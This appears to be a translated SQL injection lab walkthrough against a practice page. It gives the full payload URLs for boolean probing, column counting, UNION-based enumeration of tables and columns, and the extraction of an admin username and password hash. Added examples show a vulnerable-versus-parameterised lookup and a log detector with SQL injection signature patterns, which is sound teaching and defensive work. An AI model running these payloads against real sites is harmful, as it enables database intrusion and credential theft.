http://www.nanhack.com/payload/sql/number.php?id=1 and 1=1    page renders normally
http://www.nanhack.com/payload/sql/number.php?id=1 and 1=2    page does not render normally
This shows that when the back-end SQL statement receives the id parameter it does not wrap it in quotes, so 1=1 (true) and 1=2 (false) take effect inside the query. The code looks like this:
$id = $_GET['id'];
$sql = "select * from admins where id = $id";
# So with "and 1=1" appended, the statement becomes:
select * from admins where id = 1 and 1=1 # true, rows are returned
select * from admins where id = 1 and 1=2 # false, no rows are returned
We conclude that the injection type on this page is numeric (integer) injection.
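The following is an added example, not code from the original page: it reproduces the two PHP lines above in Python with an in-memory SQLite table standing in for the MySQL "admins" table (the schema and rows are constructed for the demo), and puts the hardened form next to it. It shows why "1 and 1=2" empties the result set when the parameter is concatenated into the SQL text, and that binding the value as a parameter (plus an integer check) keeps it from ever becoming part of the statement.

```python
import re
import sqlite3

# Constructed stand-in for the page's "admins" table (assumed schema, fake rows).
SCHEMA = """
CREATE TABLE admins (
    id INTEGER PRIMARY KEY,
    username TEXT,
    userpwd TEXT
);
INSERT INTO admins VALUES (1, 'alice', 'hash-placeholder-1');
INSERT INTO admins VALUES (2, 'bob',   'hash-placeholder-2');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def build_vulnerable_sql(id_param):
    """Exactly what the page's PHP does: the raw GET value is pasted into the SQL text."""
    return f"select * from admins where id = {id_param}"


def vulnerable_lookup(conn, id_param):
    """Executes the concatenated statement; the parameter can change the query's logic."""
    return conn.execute(build_vulnerable_sql(id_param)).fetchall()


def bound_lookup(conn, id_param):
    """Parameter binding alone: the whole string is compared as a value, never parsed as SQL."""
    return conn.execute("select * from admins where id = ?", (id_param,)).fetchall()


def safe_lookup(conn, id_param):
    """Hardened form: reject anything that is not a plain integer, then bind the value."""
    if not re.fullmatch(r"[0-9]{1,10}", id_param):
        raise ValueError("id must be a plain integer")
    return conn.execute("select * from admins where id = ?", (int(id_param),)).fetchall()


if __name__ == "__main__":
    db = open_db()
    for probe in ("1", "1 and 1=1", "1 and 1=2"):
        print(repr(probe), "->", build_vulnerable_sql(probe), "->", len(vulnerable_lookup(db, probe)), "rows")
    print("bound:", bound_lookup(db, "1 and 1=1"))
```

With concatenation, "1 and 1=1" returns the admin row and "1 and 1=2" returns nothing, which is the exact signal the walkthrough uses to confirm the injection point. With binding, the string "1 and 1=1" is just a value that matches no id, and the validated version refuses it before touching the database.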
Determine the number of columns (display positions):
http://www.nanhack.com/payload/sql/number.php?id=1 order by 8 # normal
http://www.nanhack.com/payload/sql/number.php?id=1 order by 9 # error, so the query returns 8 columns
Union query (id=-1 matches no real row, so the page renders the row produced by the UNION):
http://www.nanhack.com/payload/sql/number.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8
http://www.nanhack.com/payload/sql/number.php?id=-1 UNION SELECT 1,database(),3,4,5,6,7,8 # yields the database name nanhack
Dump the table names
http://www.nanhack.com/payload/sql/number.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()
# yields the table names admin_logs,admins,class,facebook,kaiban,message,news,user
Dump all columns of the admins table
http://www.nanhack.com/payload/sql/number.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database() and table_name='admins'
# yields the column names id,username,userpwd,email,sex,money,role,vip
Retrieve one row from admins (0x23 is the '#' character, used as a separator between username and password hash)
http://www.nanhack.com/payload/sql/number.php?id=-1 UNION SELECT 1,concat(username,0x23,userpwd),3,4,5,6,7,8 from admins limit 0,1
# yields the data 必火网络安全#68d7e8e91c53395e3d29a938c1ab5d18
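Every step of this walkthrough leaves a distinctive trace in the web server's access log: a boolean probe ("and 1=2"), an "order by N" column-count sweep, "UNION SELECT", and reads of information_schema. The following is an added example, not part of the original page, of a small detector that URL-decodes each request and tags those phases; the log lines are constructed for the demo in a shortened Apache-style format and the IP addresses are documentation ranges, not real clients.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines mirroring the request sequence in the walkthrough (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /payload/sql/number.php?id=1 HTTP/1.1" 200 512
203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /payload/sql/number.php?id=1%20and%201=2 HTTP/1.1" 200 310
203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /payload/sql/number.php?id=1%20order%20by%209 HTTP/1.1" 500 120
203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /payload/sql/number.php?id=-1%20UNION%20SELECT%201,database(),3,4,5,6,7,8 HTTP/1.1" 200 530
203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /payload/sql/number.php?id=-1+UNION+SELECT+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database() HTTP/1.1" 200 700
198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /news.php?id=42 HTTP/1.1" 200 2048
"""

# Minimal parser for the combined-log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# One pattern per phase of the technique; all are matched against the URL-decoded request.
PATTERNS = {
    "boolean_probe": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "column_count_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enumeration": re.compile(r"\binformation_schema\.", re.I),
}


def classify_request(path):
    """Return the phase tags whose pattern matches the decoded path and query string."""
    decoded = unquote_plus(path)
    return [name for name, rx in PATTERNS.items() if rx.search(decoded)]


def scan_log(text):
    """Parse each line and keep only requests that carry at least one tag."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m.group("path"))
        if tags:
            findings.append({
                "ip": m.group("ip"),
                "status": int(m.group("status")),
                "path": unquote_plus(m.group("path")),
                "tags": tags,
            })
    return findings


def summarize(findings):
    """Tagged-request count per client; several probes from one client in a short window is the alert condition."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["status"], h["tags"], h["path"])
    print(summarize(hits))
```

Decoding before matching matters: the same payload arrives as "%20", "+" or mixed-case keywords, and a pattern applied to the raw line misses most of them. The 500 on the "order by 9" request is also worth keeping as a field, since a run of boolean probes followed by a server error and then a successful UNION request is the shape of this whole walkthrough seen from the log.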